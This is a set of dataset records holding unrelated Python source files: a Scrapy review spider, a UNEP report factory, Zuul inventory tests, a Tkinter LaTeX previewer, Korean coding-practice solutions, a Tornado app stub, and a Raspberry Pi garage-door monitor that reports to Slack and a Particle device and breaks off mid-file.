matches:\n single_url = matches.group(0)\n else:\n return\n single_url = get_full_url(original_url, single_url)\n \n request = Request(single_url, callback=self.parse)\n try:\n request.meta[\"product\"] = product\n except:\n pass\n try:\n request.meta[\"review\"] = review\n except:\n pass\n yield request\n urls_xpath = \"//div[@class='blogg_big_container'][contains(.,'Test')]//a[contains(@href,'article')]/@href\"\n params_regex = {}\n urls = self.extract_list(response.xpath(urls_xpath))\n \n for single_url in urls:\n matches = None\n if \"\":\n matches = re.search(\"\", single_url, re.IGNORECASE)\n if matches:\n single_url = matches.group(0)\n else:\n continue\n single_url = get_full_url(original_url, single_url)\n \n request = Request(single_url, callback=self.level_2)\n \n \n try:\n request.meta[\"product\"] = product\n except:\n pass\n try:\n request.meta[\"review\"] = review\n except:\n pass\n yield request\n \n def level_2(self, response):\n \n original_url = response.url\n product = response.meta.get(\"product\", {})\n review = response.meta.get(\"review\", {})\n \n category_leaf_xpath = \"(//div[@id='breadcrumb_area']/a/text())[last()]\"\n category_path_xpath = \"//div[@id='breadcrumb_area']/a/text()\"\n category = CategoryItem()\n category['category_url'] = original_url\n category['category_leaf'] = self.extract(response.xpath(category_leaf_xpath))\n category['category_path'] = self.extract_all(response.xpath(category_path_xpath), ' | ')\n if self.should_skip_category(category):\n return\n yield category\n\n product_xpaths = { \n \n \n \"ProductName\":\"(//div[@id='breadcrumb_area']/following-sibling::h1)[1]/text()\",\n \n \n \"OriginalCategoryName\":\"//div[@id='breadcrumb_area']/a/text()\",\n \n \n \"PicURL\":\"(//div[@class='picture_container']/img/@src)[1]\",\n \n \n }\n product = self.init_item_by_xpaths(response, \"product\", product_xpaths)\n product['TestUrl'] = original_url\n picurl = product.get(\"PicURL\", \"\")\n if picurl and picurl[:2] == \"//\":\n product[\"PicURL\"] = \"https:\" + product[\"PicURL\"]\n if picurl and picurl[:1] == \"/\":\n product[\"PicURL\"] = get_full_url(original_url, picurl)\n manuf = product.get(\"ProductManufacturer\", \"\")\n if manuf == \"\" and \"\"[:2] != \"//\":\n product[\"ProductManufacturer\"] = \"\"\n try:\n product[\"OriginalCategoryName\"] = category['category_path']\n except:\n pass\n ocn = product.get(\"OriginalCategoryName\", \"\")\n if ocn == \"\" and \"//div[@id='breadcrumb_area']/a/text()\"[:2] != \"//\":\n product[\"OriginalCategoryName\"] = \"//div[@id='breadcrumb_area']/a/text()\"\n review_xpaths = { \n \"ProductName\":\"(//div[@id='breadcrumb_area']/following-sibling::h1)[1]/text()\",\n \"TestDateText\":\"//p[contains(.,'Testad') and contains(.,'av')]/text()\",\n \"TestPros\":\"//*[contains(text(),'Plus') or contains(text(),'Mycket')]/../text()[normalize-space()]\",\n \"TestCons\":\"//*[contains(text(),'Minus') or contains(text(),'Mindre')]/../text()[normalize-space()]\",\n \"TestTitle\":\"(//div[@id='breadcrumb_area']/following-sibling::h1)[1]/text()\", \n }\n summary = self.extract_xpath(response, \"//div[@class='tabcontent']//p[text()][1]/text()\")\n verdict = self.extract_all_xpath(response, \n \"//*[contains(text(),'Slutsats') or contains(text(),'Sammanfattning')]/../text()[normalize-space()]\",\n separator=\"\\n\")\n match1 = re.search('Slutsats\\n+([^\\n]+)', verdict)\n match2 = re.search('Sammanfattning\\n+([^\\n]+)', verdict)\n if match1:\n verdict = match1.group(1)\n elif match2:\n verdict = match2.group(1)\n \n\n review = self.init_item_by_xpaths(response, \"review\", review_xpaths)\n review['TestUrl'] = original_url\n review['TestSummary'] = summary\n review['TestVerdict'] = verdict\n\n try:\n review['ProductName'] = product['ProductName']\n review['source_internal_id'] = product['source_internal_id']\n except:\n pass\n awpic_link = review.get(\"AwardPic\", \"\")\n if awpic_link and awpic_link[:2] == \"//\":\n review[\"AwardPic\"] = \"https:\" + review[\"AwardPic\"]\n if awpic_link and awpic_link[:1] == \"/\":\n review[\"AwardPic\"] = get_full_url(original_url, awpic_link)\n\n matches = None\n field_value = review.get(\"TestDateText\", \"\")\n if field_value:\n matches = re.search(\"(\\d{4}-\\d{2}-\\d{2})\", field_value, re.IGNORECASE)\n if matches:\n review[\"TestDateText\"] = matches.group(1)\n \n\n review[\"DBaseCategoryName\"] = \"PRO\"\n \n\n yield product\n\n\n \n \n yield review\n \n","sub_path":"alascrapy/spiders/cyberphoto_se.py","file_name":"cyberphoto_se.py","file_ext":"py","file_size_in_byte":7018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"23010831","text":"from Report import Report\n\nclass PPGReceivablesReportFactory(object):\n\n def __init__(self, projectdatabase, **kw):\n self.projectdatabase = projectdatabase\n self.params = kw\n\n def getReport(self):\n # create and fill the report\n report = Report('PPG Recievables Report')\n report.setReportHeaders((\n 'PPG Recievables Report',\n ),)\n report.setTableHeaders(((\n 'IMIS No.',\n 'Project Title',\n 'Executing Agency',\n 'GEF Grant',\n 'Total Disbursements',\n 'Total Expenditures',\n 'Receivable/(Payable)',\n ),))\n report.setTableRows(self.getReportData())\n # report.setTableTotals([])\n # report.setReportFooters()\n return report\n\n def getReportData(self):\n projects = self.params.get('projects', None)\n result = []\n for project in projects:\n ppg = project.fmi_folder.get('ppg', None)\n if ppg is not None:\n result.append((\n ppg.getIMISNumber(),\n project.project_general_info.Title(),\n project.project_general_info.getLeadExecutingAgencyNames(),\n ppg.getCommittedGEFGrant(),\n ppg.getSumCashDisbursements(),\n ppg.getSumYearlyExpenditures(),\n ppg.getAmountReceivable(),\n ))\n return result\n","sub_path":"unep.project-database/trunk/reports/PPGReceivablesReport.py","file_name":"PPGReceivablesReport.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"428424840","text":"# Copyright 2017 Red Hat, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport base64\nimport os\n\nimport yaml\n\nfrom tests.base import AnsibleZuulTestCase\nfrom tests.base import ZuulTestCase\n\n\nclass TestInventoryBase(ZuulTestCase):\n\n tenant_config_file = 'config/inventory/main.yaml'\n\n def setUp(self, python_path=None):\n super(TestInventoryBase, self).setUp()\n if python_path:\n self.fake_nodepool.python_path = python_path\n self.executor_server.hold_jobs_in_build = True\n A = self.fake_gerrit.addFakeChange('org/project', 'master', 'A')\n self.fake_gerrit.addEvent(A.getPatchsetCreatedEvent(1))\n self.waitUntilSettled()\n\n def _get_build_inventory(self, name):\n build = self.getBuildByName(name)\n inv_path = os.path.join(build.jobdir.root, 'ansible', 'inventory.yaml')\n return yaml.safe_load(open(inv_path, 'r'))\n\n def _get_setup_inventory(self, name):\n build = self.getBuildByName(name)\n setup_inv_path = os.path.join(build.jobdir.root, 'ansible',\n 'setup-inventory.yaml')\n return yaml.safe_load(open(setup_inv_path, 'r'))\n\n\nclass TestInventoryPythonPath(TestInventoryBase):\n\n def setUp(self):\n super(TestInventoryPythonPath, self).setUp(python_path='fake-python')\n\n def test_single_inventory(self):\n inventory = self._get_build_inventory('single-inventory')\n\n all_nodes = ('ubuntu-xenial',)\n self.assertIn('all', inventory)\n self.assertIn('hosts', inventory['all'])\n self.assertIn('vars', inventory['all'])\n for node_name in all_nodes:\n self.assertIn(node_name, inventory['all']['hosts'])\n node_vars = inventory['all']['hosts'][node_name]\n self.assertEqual(\n 'fake-python', node_vars['ansible_python_interpreter'])\n\n self.assertIn('zuul', inventory['all']['vars'])\n z_vars = inventory['all']['vars']['zuul']\n self.assertIn('executor', z_vars)\n self.assertIn('src_root', z_vars['executor'])\n self.assertIn('job', z_vars)\n self.assertEqual(z_vars['job'], 'single-inventory')\n self.assertEqual(z_vars['message'], 'QQ==')\n\n self.executor_server.release()\n self.waitUntilSettled()\n\n\nclass TestInventory(TestInventoryBase):\n\n def test_single_inventory(self):\n\n inventory = self._get_build_inventory('single-inventory')\n\n all_nodes = ('ubuntu-xenial',)\n self.assertIn('all', inventory)\n self.assertIn('hosts', inventory['all'])\n self.assertIn('vars', inventory['all'])\n for node_name in all_nodes:\n self.assertIn(node_name, inventory['all']['hosts'])\n node_vars = inventory['all']['hosts'][node_name]\n self.assertEqual(\n '/usr/bin/python2', node_vars['ansible_python_interpreter'])\n self.assertIn('zuul', inventory['all']['vars'])\n z_vars = inventory['all']['vars']['zuul']\n self.assertIn('executor', z_vars)\n self.assertIn('src_root', z_vars['executor'])\n self.assertIn('job', z_vars)\n self.assertEqual(z_vars['job'], 'single-inventory')\n self.assertEqual(z_vars['message'], 'QQ==')\n\n self.executor_server.release()\n self.waitUntilSettled()\n\n def test_single_inventory_list(self):\n\n inventory = self._get_build_inventory('single-inventory-list')\n\n all_nodes = ('compute', 'controller')\n self.assertIn('all', inventory)\n self.assertIn('hosts', inventory['all'])\n self.assertIn('vars', inventory['all'])\n for node_name in all_nodes:\n self.assertIn(node_name, inventory['all']['hosts'])\n self.assertIn('zuul', inventory['all']['vars'])\n z_vars = inventory['all']['vars']['zuul']\n self.assertIn('executor', z_vars)\n self.assertIn('src_root', z_vars['executor'])\n self.assertIn('job', z_vars)\n self.assertEqual(z_vars['job'], 'single-inventory-list')\n\n self.executor_server.release()\n self.waitUntilSettled()\n\n def test_group_inventory(self):\n\n inventory = self._get_build_inventory('group-inventory')\n\n all_nodes = ('controller', 'compute1', 'compute2')\n self.assertIn('all', inventory)\n self.assertIn('children', inventory['all'])\n self.assertIn('hosts', inventory['all'])\n self.assertIn('vars', inventory['all'])\n for group_name in ('ceph-osd', 'ceph-monitor'):\n self.assertIn(group_name, inventory['all']['children'])\n for node_name in all_nodes:\n self.assertIn(node_name, inventory['all']['hosts'])\n self.assertIn(node_name,\n inventory['all']['children']\n ['ceph-monitor']['hosts'])\n self.assertIn('zuul', inventory['all']['vars'])\n z_vars = inventory['all']['vars']['zuul']\n self.assertIn('executor', z_vars)\n self.assertIn('src_root', z_vars['executor'])\n self.assertIn('job', z_vars)\n self.assertEqual(z_vars['job'], 'group-inventory')\n\n self.executor_server.release()\n self.waitUntilSettled()\n\n def test_hostvars_inventory(self):\n\n inventory = self._get_build_inventory('hostvars-inventory')\n\n all_nodes = ('default', 'fakeuser')\n self.assertIn('all', inventory)\n self.assertIn('hosts', inventory['all'])\n self.assertIn('vars', inventory['all'])\n for node_name in all_nodes:\n self.assertIn(node_name, inventory['all']['hosts'])\n # check if the nodes use the correct username\n if node_name == 'fakeuser':\n username = 'fakeuser'\n else:\n username = 'zuul'\n self.assertEqual(\n inventory['all']['hosts'][node_name]['ansible_user'], username)\n\n # check if the nodes use the correct or no ansible_connection\n if node_name == 'windows':\n self.assertEqual(\n inventory['all']['hosts'][node_name]['ansible_connection'],\n 'winrm')\n else:\n self.assertEqual(\n 'local',\n inventory['all']['hosts'][node_name]['ansible_connection'])\n\n self.executor_server.release()\n self.waitUntilSettled()\n\n def test_setup_inventory(self):\n\n setup_inventory = self._get_setup_inventory('hostvars-inventory')\n inventory = self._get_build_inventory('hostvars-inventory')\n\n self.assertIn('all', inventory)\n self.assertIn('hosts', inventory['all'])\n\n self.assertIn('default', setup_inventory['all']['hosts'])\n self.assertIn('fakeuser', setup_inventory['all']['hosts'])\n self.assertIn('windows', setup_inventory['all']['hosts'])\n self.assertNotIn('network', setup_inventory['all']['hosts'])\n self.assertIn('default', inventory['all']['hosts'])\n self.assertIn('fakeuser', inventory['all']['hosts'])\n self.assertIn('windows', inventory['all']['hosts'])\n self.assertIn('network', inventory['all']['hosts'])\n\n self.executor_server.release()\n self.waitUntilSettled()\n\n\nclass TestAnsibleInventory(AnsibleZuulTestCase):\n\n tenant_config_file = 'config/inventory/main.yaml'\n\n def _get_file(self, build, path):\n p = os.path.join(build.jobdir.root, path)\n with open(p) as f:\n return f.read()\n\n def _jinja2_message(self, expected_message):\n\n # This test runs a bit long and needs extra time.\n self.wait_timeout = 120\n # Keep the jobdir around to check inventory\n self.executor_server.keep_jobdir = True\n # Output extra ansible info so we might see errors.\n self.executor_server.verbose = True\n A = self.fake_gerrit.addFakeChange(\n 'org/project2', 'master', expected_message)\n self.fake_gerrit.addEvent(A.getPatchsetCreatedEvent(1))\n self.waitUntilSettled()\n self.assertHistory([\n dict(name='jinja2-message', result='SUCCESS', changes='1,1')])\n\n build = self.history[0]\n inv_path = os.path.join(build.jobdir.root, 'ansible', 'inventory.yaml')\n inventory = yaml.safe_load(open(inv_path, 'r'))\n\n decoded_message = base64.b64decode(\n inventory['all']['vars']['zuul']['message']).decode('utf-8')\n self.assertEqual(decoded_message, expected_message)\n\n obtained_message = self._get_file(self.history[0],\n 'work/logs/commit-message.txt')\n\n self.assertEqual(obtained_message, expected_message)\n\n def test_jinja2_message_brackets(self):\n self._jinja2_message(\"This message has {{ jinja2 }} in it \")\n\n def test_jinja2_message_raw(self):\n self._jinja2_message(\"This message has {% raw %} in {% endraw %} it \")\n\n\nclass TestWindowsInventory(TestInventoryBase):\n config_file = 'zuul-winrm.conf'\n\n def test_windows_inventory(self):\n\n inventory = self._get_build_inventory('hostvars-inventory')\n windows_host = inventory['all']['hosts']['windows']\n self.assertEqual(windows_host['ansible_connection'], 'winrm')\n self.assertEqual(\n windows_host['ansible_winrm_operation_timeout_sec'],\n '120')\n self.assertEqual(\n windows_host['ansible_winrm_read_timeout_sec'],\n '180')\n\n self.executor_server.release()\n self.waitUntilSettled()\n","sub_path":"tests/unit/test_inventory.py","file_name":"test_inventory.py","file_ext":"py","file_size_in_byte":9985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"172726745","text":"\n\"\"\" https://stackoverflow.com/questions/36636185/is-it-possible-for-python-to-display-latex-in-real-time-in-a-text-box \"\"\"\n\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nmatplotlib.use('TkAgg')\n\nfrom Tkinter import *\nfrom ttk import *\n\ndef graph(text):\n tmptext = entry.get()\n if tmptext == \"\":\n tmptext = \"waiting\\bfor\\binput\"\n tmptext = \"$\"+tmptext+\"$\"\n\n ax.clear()\n ax.text(0.2, 0.6, tmptext, fontsize = 20) \n canvas.draw()\n\n\nroot = Tk()\n\nmainframe = Frame(root)\nmainframe.pack()\n\ntext = StringVar()\nentry = Entry(mainframe, width=100, textvariable=text)\nentry.pack()\n\nlabel = Label(mainframe)\nlabel.pack()\n\nfig = matplotlib.figure.Figure(figsize=(4, 2), dpi=200)\nax = fig.add_subplot(111)\n\ncanvas = FigureCanvasTkAgg(fig, master=label)\ncanvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1)\ncanvas._tkcanvas.pack(side=TOP, fill=BOTH, expand=1)\n\nax.get_xaxis().set_visible(False)\nax.get_yaxis().set_visible(False)\n\n\n#Greek\ndef alpha(): \n entry.insert('insert', 'α')\ndef Beta(): \n entry.insert('insert', 'β')\ndef Gamma(): \n entry.insert('insert', 'γ')\ndef Delta(): \n entry.insert('insert', 'δ')\ndef Epsilon(): \n entry.insert('insert', 'ε')\ndef Theta(): \n entry.insert('insert', 'θ')\ndef Kappa(): \n entry.insert('insert', 'κ')\ndef Lambda(): \n entry.insert('insert', 'λ')\ndef Mu(): \n entry.insert('insert', 'μ')\ndef Xi(): \n entry.insert('insert', 'ξ')\ndef Pi(): \n entry.insert('insert', 'π')\ndef Rho(): \n entry.insert('insert', 'ρ')\ndef Sigma(): \n entry.insert('insert', 'σ')\ndef Tau(): \n entry.insert('insert', 'τ')\ndef Phi(): \n entry.insert('insert', 'φ')\ndef Chi(): \n entry.insert('insert', 'χ')\ndef Psi(): \n entry.insert('insert', 'ψ')\ndef Omega(): \n entry.insert('insert', 'ω')\n\nwid=30\nhei=30\n# Greek\nbtn_alpha = Button(root,text = 'α',command = alpha)\nbtn_alpha.place(x = 0,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'β',command = Beta)\nbtn_alpha.place(x = 0+wid*1,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'γ',command = Gamma)\nbtn_alpha.place(x = 0+wid*2,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'δ',command = Delta)\nbtn_alpha.place(x = 0+wid*3,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'ε',command = Epsilon)\nbtn_alpha.place(x = 0+wid*4,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'θ',command = Theta)\nbtn_alpha.place(x = 0+wid*5,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'κ',command = Kappa)\nbtn_alpha.place(x = 0+wid*6,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'λ',command = Lambda)\nbtn_alpha.place(x = 0+wid*7,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'μ',command = Mu)\nbtn_alpha.place(x = 0+wid*8,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'ξ',command = Xi)\nbtn_alpha.place(x = 0+wid*0,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'π',command = Pi)\nbtn_alpha.place(x = 0+wid*1,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'ρ',command = Rho)\nbtn_alpha.place(x = 0+wid*2,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'σ',command = Sigma)\nbtn_alpha.place(x = 0+wid*3,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'τ',command = Tau)\nbtn_alpha.place(x = 0+wid*4,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'φ',command = Phi)\nbtn_alpha.place(x = 0+wid*5,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'χ',command = Chi)\nbtn_alpha.place(x = 0+wid*6,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'ψ',command = Psi)\nbtn_alpha.place(x = 0+wid*7,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'ω',command = Omega)\nbtn_alpha.place(x = 0+wid*8,y = 350+hei*1,width = wid,height = hei)\n\n\n\n\n# function\ndef xa(): \n entry.insert('insert', '^{U}')\ndef xab(): \n entry.insert('insert', '_{L}^{U}')\ndef ppx(): \n entry.insert('insert', ' \\frac{\\partial ?}{\\partial x}')\ndef p2px2(): \n entry.insert('insert', ' \\frac{\\partial^2 ?}{\\partial x^2}')\ndef ddx(): \n entry.insert('insert', ' \\frac{\\mathrm{d} ?}{\\mathrm{d} x}')\ndef inte(): \n entry.insert('insert', '\\int ?')\ndef inteab(): \n entry.insert('insert', '\\int_{L}^{U}')\n\nbtn_xa = Button(root,text = 'x^(a)',command = xa)\nbtn_xa.place(x = 0+wid*10,y = 350,width = wid,height = hei)\nbtn_xab = Button(root,text = 'x_(a)^(b)',command = xab)\nbtn_xab.place(x = 0+wid*11,y = 350,width = wid*2,height = hei)\nbtn_ppx = Button(root,text = 'p/px',command = ppx)\nbtn_ppx.place(x = 0+wid*13,y = 350,width = wid*2,height = hei)\nbtn_ddx = Button(root,text = 'd/dx',command = ddx)\nbtn_ddx.place(x = 0+wid*15,y = 350,width = wid,height = hei)\nbtn_inte = Button(root,text = 'integral',command = inte)\nbtn_inte.place(x = 0+wid*16,y = 350,width = wid*2,height = hei)\nbtn_inteab = Button(root,text = 'integralab',command = inteab)\nbtn_inteab.place(x = 0+wid*10,y = 350+hei,width = wid*2,height = hei)\n\n\n\n\n\n\n\n\n\n\n\n\nroot.bind('', graph)\nroot.mainloop()","sub_path":"latexmath/latex_mat_v2.py","file_name":"latex_mat_v2.py","file_ext":"py","file_size_in_byte":5194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"456568898","text":"'''\nN : 자연수\nK : 나눌 수 있는 수\n1. N에서 1을 뺀다.\n2. N을 K로 나눈다.\n\n이 두 가지 연산을 골라서 최소한만 연산해서 1로 만드는 것이 과제\n'''\n\nM, K = map(int, input().split())\nfirst = M % K\nsecond = (M - first) // K\n\nresult = first + second\nprint(result)\n","sub_path":"이것이 취업을 위한 코딩테스트다 with 파이썬/1. 그리디 알고리즘/[099p - 2회독]1이 될 때까지 - 그리디.py","file_name":"[099p - 2회독]1이 될 때까지 - 그리디.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"618200473","text":"from tornado.web import Application\nfrom tornado.options import options, define\nfrom kazoo.client import KazooClient\n\ndefine('port', default=8080, help=\"listen port.\")\ndefine('bind', default='0.0.0.0', help=\"bind address\")\ndefine('zkroot', default='/cmdb/lock', help=\"zookeeper node of cmdb root.\")\ndefine('zkHosts', default='127.0.0.1:2181', help='zookeeper server.')\n\n\ndef make_app(router, **settings):\n app = Application(router, settings)\n zk = KazooClient(options.zkHosts)\n setattr(app, 'zk', zk)\n return app\n","sub_path":"cmdb/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"443780390","text":"from functools import reduce\nN = input() #join함수 써보기, 30은 3의 배수에 마지막자리의 숫자가 0이면 됨, 3의 배수는 자리수 �� 더해서 3의 배수, 3의 배수는 자릿수 다 합쳐서 3의 배수면 됨\nL = list(str(N)) # 999을 입력 받으면 ['9','9','9']로 쪼개줌\na = 10**(len(L)-1)\nL = sorted(L,reverse=True) #가장 큰 수니까 내림차순으로 정렬해줌\ns = reduce(lambda x,y : int(x)+int(y),L) #리스트 안의 요소를 모두 더해서 값 한개로\n\nif L[-1] != \"0\" or s%3!=0 :\n print(-1)\nelse :\n print(int(\"\".join(L))) #리스트 안의 요소를 합치는 함수, 하고나서 형변환 해줌\n\n\n \n\n\n\n\n# N = input() #join 함수 안쓰고 int로 해결함\n# L = list(map(int,str(N)))\n# l = len(L)\n# a = 10**(l-1)\n# L = sorted(L,reverse=True)\n# if L[-1] != 0 :\n# print(-1)\n# else :\n# result = 0\n# for i in range(l):\n# result += L[i]*a\n# a//=10\n# print(result)\n \n\n\n\n\n\n\n# import itertools #메모리초과 뜸\n# N = input()\n# L = list(map(int,str(N)))\n# a = 10**(len(L)-1)\n# P = list(itertools.permutations(L))\n# result = -1\n\n# for i in range(len(P)):\n# tmp = 0\n# b = a\n# for j in range(len(P[i])):\n# tmp += P[i][j]*(b)\n# b//=10\n# if tmp%30 == 0 :\n# result = max(result,tmp)\n# print(result)","sub_path":"2020_spring/2020_04_01/10610_JH.py","file_name":"10610_JH.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"125301942","text":"#!/usr/bin/python\n\n#\n# This Python script is used to monitor the status of a garage door and\n# report open and close events to a smartphone via slack IOT events.\n#\n# A Raspberry Pi model 3 or 3+ and a HC-SR05 ultrasonic distance sensor and a\n# handful of parts are required.\n#\n# Enhanced to send HTTP POST requests with the current garage door status to a\n# Particle Photon. The Photon will allow a person (via an app) to close the\n# garage door remotely. The Photon requires the current status of the garage\n# door so it can prevent a person from opening the door.\n\n# Import required standard libraries.\nfrom __future__ import print_function\nimport argparse\nimport math\nimport os\nimport requests\nimport RPi.GPIO as GPIO\nimport time\n\n# Import required libraries.\nimport gd_closer_credentials\nimport journal\nimport sensor\nimport slack\n\n# Define the Raspberry Pi GPIO pins for the sensor and LED.\nGPIO_TRIGGER = 25\nGPIO_ECHO = 24\nGPIO_STATUS_LED = 21\n\n# Define the loggers and log files that will be used to\n# record activitiesand when the program has started. A separate\n# log is usedto make it easy to see how often the program is\n# restarteddue to fatal errors.\nGDOOR_ACTIVITY_LOGGER = \"activity\"\nGDOOR_STARTUP_LOGGER = \"startup\"\nGDOOR_ACTIVITY_LOG_FILE = \"gdoor-activity.log\"\nGDOOR_STARTUP_LOG_FILE = \"gdoor-startup.log\"\n\n# Define the door states.\nDOOR_OPEN = \"open\"\nDOOR_CLOSED = \"closed\"\n\n# Define the messages that will be sent via Slack.\nDOOR_OPENED_MESSAGE = \"Garage door just opened!\"\nDOOR_CLOSED_MESSAGE = \"Garage door just closed!\"\nDOOR_OPEN_WARNING_MESSAGE = \"Garage door has been open more than {} minutes\"\n\n# If SLACK_DEBUG is set to True messages will not be sent to slack.\nSLACK_DEBUG = False\n\n# Slack message successfully sent\nSLACK_SUCCESS = 200\n\n# Garage door closing device status update commands\nGD_CLOSER_CLOSED = \"setgdclosed\"\nGD_CLOSER_OPEN = \"setgdopen\"\n\n\ndef post_gdoor_status(status):\n \"\"\"\n Send a HTTPS POST to a Particle Photon microcontroller attached to the Particle Cloud.\n The Photon keeps track of the garage door status and via an app will allow a person to\n close the garage door. The Photon will only allow the garage door to be closed (not opened)\n and to enforce that requires up-to-date status of whether the garage door is currently open\n or closed. A string with the status of the POST request is returned from this function.\n \"\"\"\n\n GD_CLOSER_SOURCE = \"gdmonitor\" # used to indicate where the POST command came from\n\n # Define the parameters that will be sent in the POST request\n headers = { 'Authorization' : 'Bearer ' + gd_closer_credentials.GD_CLOSER_BEARER }\n data = { 'arg' : GD_CLOSER_SOURCE }\n url = 'https://api.particle.io/v1/devices/' + gd_closer_credentials.GD_CLOSER_DEVICE + '/' + status\n\n # Attempt to send the POST request. Failure will not stop the monitor program.\n try:\n response = requests.post(url, headers=headers, data=data)\n return \"POST to gdcloser with status={} was successful\".format(status)\n except requests.exceptions.RequestException as err:\n return \"POST to gdcloser Request failed with error: {}\".format(err)\n except Exception as err:\n return \"POST to gdcloser failed with an unexpected error: {}\".format(err)\n \n\ndef get_average_measurement(distance_sensor,\n num_measurements,\n delay,\n door_log,\n ):\n \"\"\"\n Collect a set of measurements and return the average measurement.\n \"\"\"\n\n measurement = 0.0\n for n in range(num_measurements):\n\n distance_measurement, echo_counter = distance_sensor.get_measurement()\n measurement += distance_measurement\n\n logmsg = \"Measurement: {} Sensor measurement: {} Echo counter: {}\".format(n, distance_measurement, echo_counter)\n door_log.debug(logmsg)\n\n time.sleep(delay)\n\n average_measurement = measurement / num_measurements\n return average_measurement\n\n\ndef monitor_door(trigger_pin,\n echo_pin,\n led_status_pin,\n measurements,\n time_between_indiv_measurements,\n time_between_avg_measurements,\n open_threshold,\n warning_threshold,\n door_log,\n ):\n\n \"\"\"\n Use the sensor to monitor the status of the door and\n send slack messages when the door state changes. Also\n report via slack if the door is opened a prolonged period of time.\n \"\"\"\n\n # Record the start of execution.\n door_log.information(\"Door Monitoring Started\")\n\n # Setup for sending slack messages\n slack_iot = slack.Iot(debug=SLACK_DEBUG)\n\n # Initialize the utltrasonic distance sensor.\n distance_sensor = sensor.DistanceSensor(trigger_pin,\n echo_pin,\n led_status_pin,\n 0.05,\n DOOR_OPEN,\n DOOR_CLOSED,\n )\n\n # Keep track of the number of times measurements are taken\n iteration = -1\n\n # First time through assume door is closed.\n door_previous_status = DOOR_CLOSED\n door_status = DOOR_CLOSED\n last_warning = 0\n\n while True:\n\n iteration += 1\n\n door_log.debug(\"------- Entering iteration {:,} -------\".format(iteration))\n door_log.information(\"Checking door status ({:,})\".format(iteration))\n\n # Take the specified number of measurements and calculate the average.\n\n elapsed = get_average_measurement(distance_sensor,\n measurements,\n time_between_indiv_measurements,\n door_log,\n )\n\n door_log.debug(\"{:,} Average measurement: {}\".format(iteration, elapsed))\n\n # Calculate the distance in centimeters\n distance = distance_sensor.calculate_distance(elapsed)\n\n door_log.debug(\"{:,} Distance: {:5.1f} cm\".format(iteration, distance))\n\n # Determine what the current state of the door is by\n # comparing the distance to the number of centimeters above the\n # door is considered open\n\n if distance < open_threshold:\n door_status = DOOR_OPEN\n else:\n door_status = DOOR_CLOSED\n\n door_log.information(\"{:,} Door is currently {}\".format(iteration, door_status))\n\n # Check to see if the state of the door has changed.\n if door_status != door_previous_status:\n\n # The state of the door has changed.\n # Determine what happened.\n\n door_log.information(\"{:,} Door State Change: New Distance: {:5.1f}\".format(iteration, distance))\n\n if door_status == DOOR_OPEN:\n\n # Log that the door has opened; set the LED to\n # indicate that the door is open; send a message\n # via slack saying the door is open.\n\n door_previous_status = DOOR_OPEN\n door_log.information(DOOR_OPENED_MESSAGE)\n distance_sensor.set_door_status_led(DOOR_OPEN)\n # Don't send a slack message the first time through\n if iteration > 0:\n slack_iot.post_message(DOOR_OPENED_MESSAGE)\n if slack_iot.status_code != SLACK_SUCCESS:\n door_log.information(\"Unable to send slack garage door Opened notification\")\n\n # Record the time that door was opened.\n opened_time = time.time()\n\n # Send HTTPS POST with current status to the garage door closer device.\n door_log.information(post_gdoor_status(GD_CLOSER_OPEN))\n\n else:\n # Log that the door has closed; set the LED to\n # indicate that the door is closed; send a message\n # via slack saying the door is closed.\n\n door_previous_status = DOOR_CLOSED\n door_log.information(DOOR_CLOSED_MESSAGE)\n distance_sensor.set_door_status_led(DOOR_CLOSED)\n \n # Don't send a slack message the first time through\n if iteration > 0:\n slack_iot.post_message(DOOR_CLOSED_MESSAGE)\n if slack_iot.status_code != SLACK_SUCCESS:\n door_log.information(\"Unable to send slack garage door Closed notification\")\n \n # Send HTTPS POST with current status to the garage door closer device.\n door_log.information(post_gdoor_status(GD_CLOSER_CLOSED))\n\n # If the door is closed, blink the LED briefly. This blinking\n # is like what happens on smoke detectors and is done to indicate\n # that the sensor and Raspberry Pi are alive and well.\n if door_status == DOOR_CLOSED:\n 